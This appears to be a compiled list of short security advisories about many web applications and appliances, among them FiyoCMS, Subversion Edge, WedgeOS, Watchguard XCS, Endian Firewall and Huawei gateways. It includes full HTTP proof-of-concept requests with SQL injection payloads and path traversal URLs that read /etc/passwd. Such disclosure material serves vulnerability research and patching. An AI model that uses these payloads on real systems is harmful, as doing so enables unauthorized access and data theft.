The vulnerable file is /apps/app_article/controller/rating.php, because the rating.php includes jscore.php, so we must add referer in HTTP Data Stream to bypass the limits of authority.when the 'do' equal 'rate' the vulnerable is same too. POC: HTTP Data Stream POST //fiyocms/apps/app_article/controller/rating.php HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:37.0) Gecko/20100101 Firefox/37.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate Referer: http://localhost:80/fiyocms/ Cookie: ECS[visit_times]=4; iAv6_2132_saltkey=JLrHe7OQ; PHPSESSID=nl1e3jdfd8i7flnhffp37ro2s3 Connection: keep-alive Content-Type: application/x-www-form-urlencoded Content-Length: 48 do=getrate&id=182;select sleep(5) -- POC: POST /fiyocms/user/login HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:37.0) Gecko/20100101 Firefox/37.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate Cookie: ECS[visit_times]=4; iAv6_2132_saltkey=JLrHe7OQ; PHPSESSID=4gl29hsns650jqj5toakt044h0 Connection: keep-alive Content-Type: application/x-www-form-urlencoded Content-Length: 48 username=admin' and sleep(5) -- &password=admin
The CollabNet Subversion Edge Management Frontend allows authenticated admins to read arbitrary local files via logfile "fileName" parameter of the "tail" action. Sample URL: https://example.com:4434/csvn/log/tail?fileName=..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd&startIndex=0
Wedge Networks WedgeOS Virtual Appliance contains a number of security vulnerabilities, including unauthenticated arbitrary file read as root, command injection in the web interface, privilege escalation to root, and command execution via the system update functionality. Any user with access to the web interface of WedgeOS may submit a GET request to the ssgimages function, using directory traversal to specify an arbitrary file on disk. The web server runs as root, so any file may be read, including the shadow file. This vulnerability can be used to read the contents of the local MySQL database, which contains MD5 password hashes for the web interface. Any authenticated user may execute arbitrary commands as root. The ping, nslookup, and traceroute functions of the diagnostic interface fail to validate user input correctly, which allows the injection of arbitrary system commands. Bash brace expansion can be used to execute more syntactically complex commands. The web server runs as root, but the web application is run as the unprivileged user 'ssguser'. The web application is vulnerable to command injection, which can be used to escalate privileges to root. The system update functionality of WedgeOS allows an authenticated user to execute arbitrary commands as root. The update process is unauthenticated, and the update package is not cryptographically verified.
The Watchguard XCS virtual appliance contains a number of vulnerabilities, including unauthenticated SQL injection, command execution and privilege escalation. By combining these vulnerabilities, an attacker may remotely obtain root privileges on the underlying host. Unauthenticated SQL injection is possible through the “sid” cookie parameter in the Watchguard XCS web interface due to a PHP script that insecurely constructs an SQL query using that value. Stacked queries are possible, and allow insertion of a backdoor web interface user into the database. The web interface of XCS cointains a number of command injection vulnerabilities. These can be used to execute arbitrary commands as the apache user.
Users can inject XSS payloads that will be saved to MySQL DB, where they will execute each time when accessed. 1- In Admin under 'Media Center' users can inject XSS payloads and save to the 'media_title' field for a saved media file, create a new media page inject payload click save and then select visualize. 2- Under Website menus area users can inject XSS payloads and save for the 'menu_title' field for a Website menu. We can directory traverse access and read files outside of the current working directory in the Admin area by abusing the 'tab' parameter. http://localhost/novius-os.5.0.1-elche/novius-os/admin/?tab=../../../../ http://localhost/novius-os.5.0.1-elche/novius-os/admin/nos/login?redirect= is open to abuse by supplying an malicious a location or file.
This exploit allows an attacker to inject a reverse TCP shell into the Endian Firewall Proxy User Password Change page (/cgi-bin/chpasswd.cgi). The attacker must have knowledge of a valid proxy username and password on the target Endian Firewall. The exploit works by sending a maliciously crafted POST request to the chpasswd.cgi page, which contains a command injection payload. This payload will execute a reverse TCP shell to the attacker's specified IP and port.
A vulnerability in Huawei Home Gateway allows an attacker to change the password of the device without authentication. This vulnerability exists due to improper validation of the SOAP request sent to the device. An attacker can exploit this vulnerability by sending a specially crafted SOAP request to the device.
This exploit allows an attacker to gain access to the password of a Huawei Home Gateway device. The exploit sends a SOAP request to the device on port 80, and the response contains the password of the device. The exploit was tested on the HG530 and HG520b devices provided by TE-DATA Egypt.
The identified vulnerability (stored Cross-Site Scripting) allows the execution of JavaScript code in the browser of a valid user when it toggle the password mask on a specially crafted password. This allows, for example, an attacker to prepare a specially crafted shared password, which when read by another user, can steal all other passwords the victim has access to.
The attack can be performed through a compromised user account (for example previous password retrieval if student user acoount through SQLI - CVE-2015-4633) or due to user that clicks on a malicious link (for example in a phishing mail, forum link etc). An attacker may escalate privileges and even gain superlibrarian permissions. An attacker may target other users by stealing session tokens, impersonating them or exploiting browser vulnerabilities to gain access on their machines. Perform unauthorized actions with the permissions of a staff member. Exploit other known server-side vulnerabilities (see CVE-2015-4633 and CVE-2015-4632) to fully compromise the websever.
Services By CQR